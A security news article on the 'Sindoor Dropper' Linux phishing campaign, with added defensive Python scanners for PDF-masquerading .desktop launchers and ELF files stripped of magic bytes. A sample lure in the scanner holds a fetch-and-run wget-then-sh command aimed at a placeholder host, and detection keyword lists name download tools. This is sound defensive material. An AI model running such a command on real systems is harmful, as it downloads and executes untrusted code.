Redazione RHC : 18 September 2025 07:28
Linux systems are being targeted by a recent malware campaign, known as “Sindoor Dropper,” which uses advanced spear-phishing techniques and a complex infection process. Victims are tricked with lures related to the recent conflict between Pakistan and India, known as Operation Sindoor, into launching malicious files.
According to Nextron's analysis, once executed it opens a benign PDF to maintain the illusion of legitimacy, while silently launching a complex and heavily obfuscated infection process in the background. This process is designed to evade both static and dynamic analysis: at the time of its discovery, the initial payload had no detections on VirusTotal.
The distinguishing feature of this activity is its use of .desktop files, a method previously associated with APT36 (also known as Transparent Tribe or Mythic Leopard), an advanced persistent threat group. The attack begins when a user opens a malicious .desktop file, named “Note_Warfare_Ops_Sindoor.pdf.desktop,” which masquerades as a regular PDF document.
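As an added example (not code from the article or from Nextron's analysis), the following Python scanner flags launchers that follow the masquerading pattern described above: a document-style double extension such as .pdf.desktop, an Exec= line that runs a shell interpreter or a download tool, and no %f/%U file argument that a real viewer would receive. The keyword lists, the scoring threshold and the three sample launchers are constructed assumptions, not indicators from the campaign.

```python
"""Heuristic scanner for document-masquerading Linux .desktop launchers.

Added example, not code from the article or from Nextron. Keyword lists,
threshold and sample launchers are assumptions constructed for illustration.
"""
import configparser
import re
import shlex
from typing import Dict, List

DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "odt", "txt"}  # assumed
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}          # assumed
DOWNLOADERS = {"curl", "wget"}                                                       # assumed
FIELD_CODE_RE = re.compile(r"%[fFuU]")  # a real viewer receives the document via %f/%F/%u/%U
SUSPICIOUS_THRESHOLD = 2                # assumed: two independent hits before alerting


def parse_desktop(text: str) -> Dict[str, str]:
    """Return the [Desktop Entry] section as a dict, or {} if absent or malformed."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case ("Exec", "Terminal")
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}


def exec_tokens(exec_line: str) -> set:
    """Basenames of every word in Exec=, including words hidden inside 'sh -c "..."'."""
    try:
        argv = shlex.split(exec_line)
    except ValueError:
        argv = exec_line.split()
    tokens = set()
    for arg in argv:
        for word in re.split(r"[\s;&|]+", arg):
            if word:
                tokens.add(word.rsplit("/", 1)[-1])
    return tokens


def scan_desktop(filename: str, text: str) -> Dict[str, object]:
    """Score one launcher; each matched heuristic adds one reason and one point."""
    reasons: List[str] = []
    parts = filename.lower().split(".")
    # "Note.pdf.desktop" -> parts[-2] == "pdf": a document extension hidden before .desktop
    double_ext = len(parts) >= 3 and parts[-1] == "desktop" and parts[-2] in DOCUMENT_EXTS
    if double_ext:
        reasons.append(f"document-style double extension .{parts[-2]}.desktop")
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    tokens = exec_tokens(exec_line)
    if tokens & INTERPRETERS:
        reasons.append("Exec runs a shell or script interpreter")
    if tokens & DOWNLOADERS:
        reasons.append("Exec references a download utility")
    if double_ext and not FIELD_CODE_RE.search(exec_line):
        reasons.append("claims to be a document but Exec passes no %f/%U file argument")
    score = len(reasons)
    return {"file": filename, "score": score,
            "suspicious": score >= SUSPICIOUS_THRESHOLD, "reasons": reasons}


# Constructed sample launchers (not files from the campaign).
BENIGN_VIEWER = """[Desktop Entry]
Type=Application
Name=Document Viewer
Exec=evince %U
Icon=org.gnome.Evince
Terminal=false
MimeType=application/pdf;
"""
WRAPPED_BUT_BENIGN = """[Desktop Entry]
Type=Application
Name=User Manual
Exec=sh -c "xdg-open ~/manual.pdf"
Terminal=false
"""
LURE = """[Desktop Entry]
Type=Application
Name=Note_Warfare_Ops_Sindoor.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "wget -q http://example.invalid/stage1 -O /tmp/stage1; sh /tmp/stage1"
"""
SAMPLES = {
    "viewer.desktop": BENIGN_VIEWER,
    "manual.desktop": WRAPPED_BUT_BENIGN,
    "Note_Warfare_Ops_Sindoor.pdf.desktop": LURE,
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        result = scan_desktop(name, body)
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} {name} score={result['score']} {result['reasons']}")
```

On a real host the same function can be run over every .desktop file under ~/Desktop, ~/.local/share/applications and /usr/share/applications. The score-based approach keeps a lone `sh -c` wrapper in a legitimate launcher below the alert threshold while the lure, which matches all four heuristics, is flagged.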
The .desktop file downloads several components, including an AES decryptor (mayuw) and an encrypted downloader (shjdfhd). The decryptor, a UPX-compressed Go binary, is intentionally corrupted by removing its ELF magic bytes, likely to bypass security scans on platforms like Google Docs. The .desktop file restores these bytes on the victim’s computer to make the binary executable again.
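Because the corrupted decryptor no longer starts with 0x7f 'E' 'L' 'F', a scanner that identifies file types by that signature alone treats it as unknown data. As an added example (not code from the article or from Nextron), the Python checker below looks for the remaining ELF identification and header fields at the offsets they would occupy if the four magic bytes were cut out of the file or overwritten in place. Both layouts are assumptions about how the removal was done, and the sample header is constructed here, not taken from the campaign.

```python
"""Heuristic detector for ELF binaries whose magic bytes have been removed.

Added example, not code from the article or from Nextron. The two layouts
checked (magic cut out, magic overwritten) are assumptions; the sample
Elf64 header is constructed for illustration.
"""
import struct
from typing import Optional

ELF_MAGIC = b"\x7fELF"
# e_machine values for common targets (subset of the ELF specification).
KNOWN_MACHINES = {0x03: "x86", 0x08: "MIPS", 0x28: "ARM",
                  0x3E: "x86-64", 0xB7: "AArch64", 0xF3: "RISC-V"}
VALID_TYPES = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}


def header_tail_plausible(tail: bytes) -> Optional[str]:
    """Check the 20 bytes that follow the magic: e_ident[4:16], e_type, e_machine, e_version.

    Returns a short description when the bytes look like an ELF header, else None.
    """
    if len(tail) < 20:
        return None
    ei_class, ei_data, ei_version = tail[0], tail[1], tail[2]
    if ei_class not in (1, 2) or ei_data not in (1, 2) or ei_version != 1:
        return None
    if any(tail[5:12]):  # EI_PAD (e_ident[9:16]) must be zero
        return None
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine, e_version = struct.unpack(endian + "HHI", tail[12:20])
    if e_type not in VALID_TYPES or e_machine not in KNOWN_MACHINES or e_version != 1:
        return None
    bits = 32 if ei_class == 1 else 64
    return f"ELF{bits} {VALID_TYPES[e_type]} {KNOWN_MACHINES[e_machine]}"


def classify(data: bytes) -> str:
    """Classify the leading bytes of a file as elf / headerless-elf / overwritten-magic-elf / not-elf."""
    if data[:4] == ELF_MAGIC:
        return "elf"
    if header_tail_plausible(data[0:20]):   # layout (a): magic cut out, file starts at EI_CLASS
        return "headerless-elf"
    if header_tail_plausible(data[4:24]):   # layout (b): magic overwritten, rest of header intact
        return "overwritten-magic-elf"
    return "not-elf"


def classify_file(path: str) -> str:
    """Classify a file on disk by its first 64 bytes."""
    with open(path, "rb") as fh:
        return classify(fh.read(64))


def build_elf64_header(e_machine: int = 0x3E) -> bytes:
    """Constructed minimal Elf64_Ehdr (64 bytes) used as sample input; not a real binary."""
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0, 0]) + b"\x00" * 7  # ELFCLASS64, little-endian, v1
    fields = struct.pack("<HHIQQQIHHHHHH",
                         2, e_machine, 1,   # e_type=EXEC, e_machine, e_version
                         0x401000, 64, 0,   # e_entry, e_phoff, e_shoff
                         0, 64, 56, 1,      # e_flags, e_ehsize, e_phentsize, e_phnum
                         64, 0, 0)          # e_shentsize, e_shnum, e_shstrndx
    return e_ident + fields


if __name__ == "__main__":
    intact = build_elf64_header()
    samples = {
        "intact": intact,
        "magic cut out": intact[4:],
        "magic zeroed": b"\x00" * 4 + intact[4:],
        "pdf": b"%PDF-1.7\n" + b"\x00" * 60,
    }
    for label, blob in samples.items():
        print(f"{label:14} -> {classify(blob)}")
```

Files in an upload or mail quarantine that this check labels headerless-elf or overwritten-magic-elf deserve the same handling as any unsigned Linux executable, even though generic type detection reports them as unknown data. UPX-packed binaries keep a normal ELF header on the decompression stub, so the check applies to them as well.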
The final payload is a repurposed version of MeshAgent, a legitimate open-source remote administration tool. Once deployed, MeshAgent connects to a command and control (C2) server hosted on an Amazon Web Services (AWS) EC2 instance at wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx.
Running the downloaded components starts a multi-step process in which each component decrypts and executes the next. The chain includes basic anti-VM checks, such as verifying network adapter names and vendors, blacklisting specific MAC address prefixes, and checking machine uptime.
All strings within the droppers are obfuscated using a combination of Base64 encoding and DES-CBC encryption to further hinder analysis. Once MeshAgent is deployed, the attacker has full remote access to the compromised system, allowing them to monitor user activity, move laterally across the network, and exfiltrate sensitive data, Nextron said.
The Sindoor Dropper campaign highlights an evolution in threat actors’ attack techniques, demonstrating a clear focus on Linux environments, which are less commonly targeted by phishing campaigns.